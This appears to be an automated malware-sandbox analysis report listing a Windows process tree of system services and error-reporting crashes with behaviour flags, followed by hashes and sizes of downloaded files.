[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
  PID:4520

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
  PID:460

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
  PID:4072

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p
  PID:4304

[depth 1] C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:4204

[depth 2] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -u -p 4204 -s 836
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4696

[depth 1] C:\Windows\System32\RuntimeBroker.exe
  command line: C:\Windows\System32\RuntimeBroker.exe -Embedding
  PID:3736

[depth 1] C:\Windows\System32\spoolsv.exe
  command line: C:\Windows\System32\spoolsv.exe
  PID:1268

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
  PID:1984

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
  PID:1956

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
  PID:1864

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID:1856

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
  PID:1804

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
  PID:1772

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache
  PID:1684

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
  PID:1628

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
  PID:1584

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
  PID:1496

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
  PID:1448

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
  PID:1440

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
  PID:1404

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
  PID:1320

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
  PID:1244

[depth 1] C:\Windows\System32\svchost.exe
  command line: C:\Windows\System32\svchost.exe -k WerSvcGroup
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  PID:3768

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1180 -ip 1180
  PID:936

[depth 2] C:\Windows\SysWOW64\WerFault.exe
  command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 4800 -ip 4800
  PID:1384

[depth 2] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -pss -s 556 -p 3216 -ip 3216
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:2944

[depth 2] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -pss -s 568 -p 2908 -ip 2908
  - Suspicious use of NtCreateProcessExOtherParentProcess
  PID:4392

[depth 1] C:\Windows\servicing\TrustedInstaller.exe
  command line: C:\Windows\servicing\TrustedInstaller.exe
  PID:1212

[depth 1] C:\Windows\system32\svchost.exe
  command line: C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
  PID:1280

[depth 1] C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:3216

[depth 2] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -u -p 3216 -s 368
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:1156

[depth 1] C:\Windows\system32\DllHost.exe
  command line: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
  PID:2908

[depth 2] C:\Windows\system32\WerFault.exe
  command line: C:\Windows\system32\WerFault.exe -u -p 2908 -s 464
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  PID:3480
Network
MITRE ATT&CK Enterprise v6
Downloads
- Filesize: 37KB
  MD5: f993580670e3aef0530dbdfdd52e94ca
  SHA1: 0147d041f26bddd0dbb53159b35240542aaa154b
  SHA256: 88ef519bcb69ad486b6f68a2ddc293fc39f921425801b592240d221210ac812c
  SHA512: f5af66fd5b40b51f49cf4818d174c994e77eece8088cd0b2d4cd7c3846a26e743089d22d2f743fb5bc3abb53d9de27bee85066943b6f05ce5d2608fc88fd3566

- Filesize: 37KB
  MD5: b27e865aeac2f30edb1a7421f69b706b
  SHA1: d6c5f66386f5882eb34a22e8d2fe9f46585289f7
  SHA256: c06fe2e6c1a21a99af76b67f9d30a871d883c00571da6061a464ad45c39c4f8d
  SHA512: b3bdc62fa35e497bc9b4c922b1a9e14794574cc8da89decd716fdcde8ce203e2164e5d644a54ca8adc37cc00647b0d1c0aa23b134d1769df694d3eb988879914

- Filesize: 13KB
  MD5: b67d0c36c8d127de55331c2f01d276ee
  SHA1: 966d07d31b845dc7a3b17a1ce96a6ebca827cf8f
  SHA256: f8f1fdcd622844f6c78d8fa131a83a275030b23cb50b14c409094054c0b2be1a
  SHA512: 6a32af0f9b9c28d811b34f32c7be1d5ef3e58f00fb624965f82796951940f3c63bd53e73314efb44f3a3e0982e5808ceb03ab18195a55b2a46510e347e3a1cdd

- Filesize: 13KB
  MD5: 62abcce7bfae19943d01ae631ccba052
  SHA1: 13c7ab9038fb7778d093688891aab710315e5e93
  SHA256: 438b62b424ca1a722bb0d5da18e9d5a415e655931fc96846c20576973de29461
  SHA512: 7ab8c195a1fa003c9d6109d2d5fc790306dc22e4b98e48a1c89b5b4d37fe0a60010c7edc82d4b1e0db614db0681b9aae317318c296b5e7d174045c26a4f63822

- Filesize: 35KB
  MD5: 7a0fc09afe684df626cb0946e7adecea
  SHA1: 519476614bec773806949a5062a9a1b88ceb8a8e
  SHA256: a389f12dda67595460d6126d4892f20e0611438592b896c0286d8ee1102b8aa6
  SHA512: faf437df3261759f906c2ea180b02e707d9723807f32c42cf0513014b4192eef02e70089a32641979ba076c6bcaafeff4ef581c7f9ef728b184440d27e7c2e45

- Filesize: 13KB
  MD5: e4d1099730a7b3cef613e513c8ab93c1
  SHA1: 07b46e39ba18f2257fa457503cf10f0ae432a2fb
  SHA256: aed2a3f4ed925f435e0a49755faec14ed25ae727975947e43ca2f027a434adf4
  SHA512: 97a1f7525d250f789de313b0b8b94fcf58d74fc88eabaa3e0a349c1590203036bbf1ea3db16fb966532195066b055304a21004cc16243c770a88e5b00f0f313a

- Filesize: 35KB
  MD5: f49fd4a936729b7d48d000e0d25b1749
  SHA1: c6086c51d7d491a071441a553475f107afdf5ad6
  SHA256: 413f00c12a845c63b27793846e1131fa0592c2033eacfe5c8d3cb00fbc340106
  SHA512: 0055710db934ab84003612e7482ebc08bbf446af1a2bf0b4166f673bdd8b51a8f9ce6d9f7d6b57d8f6db06b7f345898b610f03dc97fffacf95e3ab148e612953

- Filesize: 13KB
  MD5: 24f9a61651b91727b24e7f71d73be9f3
  SHA1: 10234bdd506470ea68780abe131aaf9fc6e1a5c1
  SHA256: d4721814f7bf31176a91686d5b0272931912b4ada5d689c9b720d263b65330eb
  SHA512: 8e0074da8c72fc169edfeb162d992ac4d9f421cd354b20acb59255c9dd7049366d83e02a8407666d16f79a895f23fcdaedb1f1a28aafb9f7e23af0beaa9480b2

- Filesize: 4KB
  MD5: bdb25c22d14ec917e30faf353826c5de
  SHA1: 6c2feb9cea9237bc28842ebf2fea68b3bd7ad190
  SHA256: e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
  SHA512: b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

- Filesize: 53KB
  MD5: 124edf3ad57549a6e475f3bc4e6cfe51
  SHA1: 80f5187eeebb4a304e9caa0ce66fcd78c113d634
  SHA256: 638c51e173ca6b3469494a7e2e0b656021a761f77b4a83f3e430e82e7b9af675
  SHA512: b6c1a9051feeffad54ba1092fd799d34a9578368d7e66b31780fe478c1def0eb4094dce2879003f7389f2f9d86b94a3ef3975e78092a604597841c9b8db120ee

- Filesize: 19KB
  MD5: 95b5d975377c32a6ef28bbf4018379ec
  SHA1: a27a10c1e0afa57f0341ea6529adb9854ae9e6ee
  SHA256: 99d85f152acf2a98615b3c2dc1fc0a2bde5d960871d7625d93b8c9c80744e2b8
  SHA512: ab12d12cd182873162b972617a07c20376aa502377ad6c6998558def326b8fd206d9168d3a17ef3a19f5f86b9eca5833823ce89590a8824ee25b7032b803345b

- Filesize: 1KB
  MD5: c697637a9b17f577fccd7e83a5495810
  SHA1: 04e6054584786b88994b0e0a871562227fe2a435
  SHA256: 54992c76969f661b605042ebdc73912dbc42e3f88aa6ffecb7191a598fc17164
  SHA512: 66f85a03889786d2c910880bf32e9ea380740b665f11828d06acb03b6f63fb11be1d70e67acb3bc2118f2c35824919458ce7c85f6843c72a3e5ca44fadc0b3c0

- Filesize: 8KB
  MD5: 97e21c3ace4c909e979d057e48b0511b
  SHA1: f9abd1563142bc87241792a6bff9266b000477f9
  SHA256: e47e6b4f3b270f2492a6dc3a787b5d757677e806021cc0c7406b9b68c4928215
  SHA512: 72eb2f4cb72a868fddeebe7d3206a6df581dc415ffb39552b16b805feef268c6e32295f61c9125699d95728812704438272c3e61097db6454b13455358af2580

- Filesize: 512KB
  MD5: 92a5394c98970c2df97518ccfc941abc
  SHA1: ae03e5eb972afe00e87028bf85c0cf82734748dd
  SHA256: 4e13d98ce827d7c819bf3c4a9f2710375700d4be1dd86e70020fa8fd6a849f6b
  SHA512: 3a0fee76337d78dbeca41301158bb33d2a3f78fb4c82a27c973d4dfd52ec072561568f2721a661f28afc26765cbd846cca270005c0e388c9fb88f4ffe5928d5f

- Filesize: 14.0MB
  MD5: fc15ddc1aa5e610bdb3810289a075271
  SHA1: ff298ce2d03f8e42eb7eba3fd94310a94148dcae
  SHA256: 7fe3aa950904d80928e76f7ced4c581374da94acf39546ec5e69921ee943f87c
  SHA512: e2ead360c0244bedbd3dd5b5d200567aa3b0b1d7424440e0ff6132a4408e38d2c53ea20391863680fb54b7aa5aa7999ae4b6e70ee597676a4be5f96e4804435c

- Filesize: 16KB
  MD5: 3694b353dbe71a48a6dcb93f2725f228
  SHA1: 43822178e3d40fbf92093b57ae178019fba8f6ec
  SHA256: e8dda600070ff70908f0f315720406011f205656af8cab423660931a2ae8bdcd
  SHA512: 8614cf3c1e79350ed721ee6e991d1613e09d5edc2f5896f66cf3aae372a796cfd18320fbb6d3f0de707c6931bae3a90786e8a8a658239837858868f11aedea59

- Filesize: 1.4MB
  MD5: bb86a343080f9f4696c250ef31a18d9d
  SHA1: 43b2193dcb1d56eac73ba88a7b461822074192d6
  SHA256: 095b49a6a4f0c7535d11e071185fc0e94fb00f1b01730ca583889a70ef7ad7e0
  SHA512: 24807f80547879d3131be311d738b411e335a9489bbe80649fbfd6b6265852e7e9aec461f5e5f5e4e7ea0239c145a18f9b5e91aa31888227b2b080b75a439560
- Filesize: 3.7MB
  MD5: f5c51e7760315ad0f0238d268c03c60e
  SHA1: 85ebaaa9685634143a72bc82c6e7df87a78eed4c
  SHA256: ea42fcee681ec3b06dac54d3da4b866143d68cbaa0dd0e00e7c10ae2a7c9d2aa
  SHA512: d3b9ac3bf5467bd25439f2d29457361ac14d1be5b060078a7ef4f78540994679f9fed245d70a4e2a6edbc37b94a042be407ad7fbbd5a95600312946ffb558f35
- Filesize: 1.4MB
  MD5: b6bbab9f72c88d07b484cc339c475e75
  SHA1: f06141cedf2aac3cfac6c997d99c00d8e7c5b4c1
  SHA256: dd47342f809e86e447b68827dd3a1e72ea0795b71976ecd6fa242013b767b14f
  SHA512: 1ee084d4283b7359b5f261337e744adecc6a1e26a18b4d2412e6f53d2b602b5e8538112065d27a536776dedadfd0ec8a276aa977389f21f4491539753a0b9fa5
- Filesize: 477KB
  MD5: 3753f9966e5b4fdc87184c1749f2bd25
  SHA1: 69b76e86bfb4fcf4c0eb2f5fc8b71356e9f4e756
  SHA256: 0f1d090c622967acfa7bde2ef5238255ce8924d5ff7bbf72661821e3d901f299
  SHA512: 3283dfee96e0089873336f3c699604eb33d5c091cdf65a193d4f8e1850625823f62dc02d242290dfd10c10f127bfec26f55b6438fc9ab2c0dd5c9f7cb764e8b6